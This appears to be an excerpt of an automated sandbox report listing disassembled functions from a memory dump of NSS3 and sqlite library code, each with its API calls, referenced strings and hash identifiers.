Part of subcall function 6C6A8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C6555D0,00000000,00000000), ref: 6C6A868B
Part of subcall function 6C6A8680: PR_NewLock.NSS3(00000000,00000000), ref: 6C6A86A0
Part of subcall function 6C6A8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C6A86B2
Part of subcall function 6C6A8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C6A86C8
Part of subcall function 6C6A8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C6A86E2
Part of subcall function 6C6A8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C6A86EC
Part of subcall function 6C6A8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C6A8700

PR_NewMonitor.NSS3(?,6C6EAA9B,?,?,?,?,?,?,?,00000000,?,6C6E80C1), ref: 6C6E687D

Part of subcall function 6C641770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6418DE
Part of subcall function 6C641770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6418F1

PR_NewMonitor.NSS3(?,6C6EAA9B,?,?,?,?,?,?,?,00000000,?,6C6E80C1), ref: 6C6E688C

Part of subcall function 6C641770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C6418FC
Part of subcall function 6C641770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C64198A

PR_NewLock.NSS3 ref: 6C6E68A5

Part of subcall function 6C7198D0: calloc.MOZGLUE(00000001,00000084,6C640936,00000001,?,6C64102C), ref: 6C7198E5

PR_NewLock.NSS3 ref: 6C6E68B4

Part of subcall function 6C7198D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C719946
Part of subcall function 6C7198D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5D16B7,00000000), ref: 6C71994E
Part of subcall function 6C7198D0: free.MOZGLUE(00000000), ref: 6C71995E

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: 2037d6c6e5b50089e221d1199dd096412fea65d35e683b4c7f6d8ec16274189e
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: F501177060AF0B46E7516B7548143D77AE49F06388F14453F85AAC9B50EF71E408CBBE

Function 6C63AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C63AFDA

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C63AFC4
%s at line %d of [%.10s], xrefs: 6C63AFD3
misuse, xrefs: 6C63AFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6C63AF5C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 49ce3d7126dc21790a852734a1323841b4b46ed2629eaa93a8c81676bbe97145
Instruction ID: cc48d3b6dd0f42abda03a091663f80657c0467757186f32d54182a31db5f781a
Opcode Fuzzy Hash: 49ce3d7126dc21790a852734a1323841b4b46ed2629eaa93a8c81676bbe97145
Instruction Fuzzy Hash: 2E910675A042258FDF04CF59C854BAAB7F1BF45314F1960ACE869AB792C334ED01DB64

Function 6C5E4AC0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000B2F5), ref: 6C5E4C2B

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C5E4C24
Pvl, xrefs: 6C5E4B8D
winWrite1, xrefs: 6C5E4BC2
winWrite2, xrefs: 6C5E4C01

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: Pvl$delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
API String ID: 632333372-2927844308
Opcode ID: 59353ef413bddd407c534678af4af958f5d94e268718e72b7be604b3054a2830
Instruction ID: e860c08d3c3f35368f7b93a7ee1252d61f0efadf2bfd4e8e75d22eb2559630b3
Opcode Fuzzy Hash: 59353ef413bddd407c534678af4af958f5d94e268718e72b7be604b3054a2830
Instruction Fuzzy Hash: B741A072A043059BDB08DF59DC54A5FB7E9EFC9364F108A29F858C7790E730DA048B92

Function 6C6649C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 6C664860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C664894

PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C666361,?,?,?), ref: 6C664A8F
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C666361,?,?,?), ref: 6C664AD0

Strings

acfl, xrefs: 6C6649FB
^jfl, xrefs: 6C6649C5
acfl, xrefs: 6C664AB4

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Error$DecodeItem_QuickUtil
String ID: ^jfl$acfl$acfl
API String ID: 1982233058-3663019223
Opcode ID: 8cb8bf53905bfb4bb349ad1a21c97cf3a23c21f22715da3b0feaf827e1c72318
Instruction ID: c41681a8b319e01451b04bb91961b2f7780a97aef9a5dc400874d2d16e3749d2
Opcode Fuzzy Hash: 8cb8bf53905bfb4bb349ad1a21c97cf3a23c21f22715da3b0feaf827e1c72318
Instruction Fuzzy Hash: D831CA70A04106B7EB10CA4ADCB07BF7266DB82318F60463AD515F7FC9D6749845879F

Function 6C6C6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C6C6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6C6E57

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C6C6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C6C6EAA

Strings

nvl, xrefs: 6C6C6DF9

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nvl
API String ID: 3163584228-2622381835
Opcode ID: 07296b1ea92364811bb9fb18c4ede15eb1b05a0ab13e1ca6add2467ad655cf4e
Instruction ID: 27d761a5b64c3951a42306a2f93fccc51be671b2957b802cd5d755221fd57891
Opcode Fuzzy Hash: 07296b1ea92364811bb9fb18c4ede15eb1b05a0ab13e1ca6add2467ad655cf4e
Instruction Fuzzy Hash: 5F31C331718612EEDB145F34CD083A6BBA4EB4931AF14063ED89AD6A40E730E456CF8F

Function 6C664B00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C664B66
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C664B7D
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C664B97
PORT_ZAlloc_Util.NSS3(00000018), ref: 6C664BB7

Part of subcall function 6C6B0D30: calloc.MOZGLUE ref: 6C6B0D50
Part of subcall function 6C6B0D30: TlsGetValue.KERNEL32 ref: 6C6B0D6D

Strings

, xrefs: 6C664B8A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: AlgorithmPolicy$Alloc_ErrorUtilValuecalloc
String ID:
API String ID: 4087055539-3916222277
Opcode ID: c9c8e6af9c8a07218788b2fd3716714f66a412ea098f9993dbdb4350e022ad86
Instruction ID: b1e505c580478c8534404334b788f99fd7eb30a658cb7af77af6973a170122f9
Opcode Fuzzy Hash: c9c8e6af9c8a07218788b2fd3716714f66a412ea098f9993dbdb4350e022ad86
Instruction Fuzzy Hash: EC2129B1D0024A5BDF10CA76DC51BBFBBB59F8231CF240225F525A6E81E7B09518C7AB

Function 6C6FA8F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C6E2AE9,00000000,0000065C), ref: 6C6FA91D

Part of subcall function 6C69ADC0: TlsGetValue.KERNEL32(?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE10
Part of subcall function 6C69ADC0: EnterCriticalSection.KERNEL32(?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE24
Part of subcall function 6C69ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C67D079,00000000,00000001), ref: 6C69AE5A
Part of subcall function 6C69ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE6F
Part of subcall function 6C69ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE7F
Part of subcall function 6C69ADC0: TlsGetValue.KERNEL32(?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEB1
Part of subcall function 6C69ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C6E2AE9,00000000,0000065C), ref: 6C6FA934
SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C6E2AE9,00000000,0000065C), ref: 6C6FA949
free.MOZGLUE(?,00000000,0000065C), ref: 6C6FA952

Strings

*nl, xrefs: 6C6FA8F6

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: *nl
API String ID: 1595327144-2717886746
Opcode ID: 4a383644227860d967ceb80bad618949c6cacee2de071f88d2c0bf5d9b855ff5
Instruction ID: 2dd2082780e557dd1d722044774d7f80b324fb0678dceecdbb246ee9cd8f4b07
Opcode Fuzzy Hash: 4a383644227860d967ceb80bad618949c6cacee2de071f88d2c0bf5d9b855ff5
Instruction Fuzzy Hash: 4C3137B46012019FDB04CF28D980E62BBF9FF49318B1581A9E8298B757E730EC05CBA5

Function 6C726B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

sqlite3_snprintf.NSS3(?,6C726AC0,6C78AAF9,00000000,?,6C726AC0,?), ref: 6C726BA9
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C726AC0,?), ref: 6C726BB2
sqlite3_snprintf.NSS3(?,6C726AC0,OsError 0x%lx (%lu),00000000,00000000,?,6C726AC0,?), ref: 6C726BD9

Strings

Pvl, xrefs: 6C726B8D
OsError 0x%lx (%lu), xrefs: 6C726BCE

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_snprintf$sqlite3_free
String ID: OsError 0x%lx (%lu)$Pvl
API String ID: 2089385377-3411664238
Opcode ID: a496782f5c3c1f4e4960a20b9b201da3835911a3b908d6b1f4c40740673b6d15
Instruction ID: 7b774fb8d93a6e9139b95b0005d14cf780a62e60f3ed8a0c9e4c1b121dddb0c6
Opcode Fuzzy Hash: a496782f5c3c1f4e4960a20b9b201da3835911a3b908d6b1f4c40740673b6d15
Instruction Fuzzy Hash: 5D11AF76A00109ABDB08DFA5ED9DDAF7B79EF8A345B10003DE50593A41EB205E04C6A9

Function 6C72A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C5F7915,?,?), ref: 6C72A86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C5F7915,?,?), ref: 6C72A8A6

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C72A891
%s at line %d of [%.10s], xrefs: 6C72A8A0
database corruption, xrefs: 6C72A89B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 9006e683029d2cf14e018370b15ab8c7429a8236f9635a329d6fb7796824189c
Instruction ID: 3642b43a69afd04dd63774c87f2a20ddc5df1f7d3612eb3aaf69d94ef73cb43d
Opcode Fuzzy Hash: 9006e683029d2cf14e018370b15ab8c7429a8236f9635a329d6fb7796824189c
Instruction Fuzzy Hash: 93112971A00204AFDB058F12DD41A6EB7A5FF49324F004439FD154BB41EB34ED56CB95

Function 6C68CAA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C66B1EE,D958E836,?,6C6A51C5), ref: 6C68CAFA
PR_UnloadLibrary.NSS3(?,6C6A51C5), ref: 6C68CB09
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C66B1EE,D958E836,?,6C6A51C5), ref: 6C68CB2C
PR_UnloadLibrary.NSS3(6C6A51C5), ref: 6C68CB3E

Strings

NSS_DISABLE_UNLOAD, xrefs: 6C68CAF5, 6C68CB27

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: LibrarySecureUnload
String ID: NSS_DISABLE_UNLOAD
API String ID: 4190191112-1204168554
Opcode ID: 76cf0e9c5b9e1215831f42b5e9e054f4f2f698713f59ed6ab65ad1cb9d3d2857
Instruction ID: 362b2673e0ad86745159df79e16b174e5e1fa9ec76dddd688ad3c8eb4172b8df
Opcode Fuzzy Hash: 76cf0e9c5b9e1215831f42b5e9e054f4f2f698713f59ed6ab65ad1cb9d3d2857
Instruction Fuzzy Hash: 1C11B4B1B02A11ABD754EF25E808B42B6B4BF01B59F04833AD90683A40D770E194CBEE

Function 6C640DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C640BDE), ref: 6C640DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C640BDE), ref: 6C640DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C640BDE), ref: 6C640DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C640BDE), ref: 6C640E32

Strings

%s incr => %d (find lib), xrefs: 6C640E2D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: bc6b5875b17805242698fb41718a40ce45e67e7b687651a4bde3c299df9ea637
Instruction ID: a1a2d71e554ac5d16cb7eb8362636ccec162f22189dc586c63fef9a8274ccdc6
Opcode Fuzzy Hash: bc6b5875b17805242698fb41718a40ce45e67e7b687651a4bde3c299df9ea637
Instruction Fuzzy Hash: FB012472700624AFE7208F259C49E1777FCDB45B09B04843DED09D7A41E762EC2987E5

Function 6C6FAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]nl,00000000,?,?,6C6D6AC6,?), ref: 6C6FAC2D

Part of subcall function 6C69ADC0: TlsGetValue.KERNEL32(?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE10
Part of subcall function 6C69ADC0: EnterCriticalSection.KERNEL32(?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE24
Part of subcall function 6C69ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C67D079,00000000,00000001), ref: 6C69AE5A
Part of subcall function 6C69ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE6F
Part of subcall function 6C69ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE7F
Part of subcall function 6C69ADC0: TlsGetValue.KERNEL32(?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEB1
Part of subcall function 6C69ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEC9

PK11_FreeSymKey.NSS3(?,@]nl,00000000,?,?,6C6D6AC6,?), ref: 6C6FAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]nl,00000000,?,?,6C6D6AC6,?), ref: 6C6FAC59
free.MOZGLUE(8CB6FF01,6C6D6AC6,?,?,?,?,?,?,?,?,?,?,6C6E5D40,00000000,?,6C6EAAD4), ref: 6C6FAC62

Strings

@]nl, xrefs: 6C6FAC05

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]nl
API String ID: 1595327144-1632522648
Opcode ID: fa6982e2f7cb0de6bb2f3703adbc3884e885850c9e7266d9945c174036c7836b
Instruction ID: 96968e15d712d2bf2b7c3cbabc7411a1159df50cbfd1495cab9fc49957aee61b
Opcode Fuzzy Hash: fa6982e2f7cb0de6bb2f3703adbc3884e885850c9e7266d9945c174036c7836b
Instruction Fuzzy Hash: 96018BB5A002009FDF00CF58E8D0B5677E8AF05B18F1880A8E9598F707D731E809CBAA

Function 6C5D2940 Relevance: 7.8, APIs: 6, Instructions: 327stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C5D1360,00000000), ref: 6C5D2A19
memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6C5D1360,00000000), ref: 6C5D2A45
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C5D2A7C

Part of subcall function 6C5D2D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,480F8E0B,?,?,00000000,?,6C5D296E), ref: 6C5D2DA4

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5D2AF3
memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6C5D1360,00000000), ref: 6C5D2B71
memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C5D2B90

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
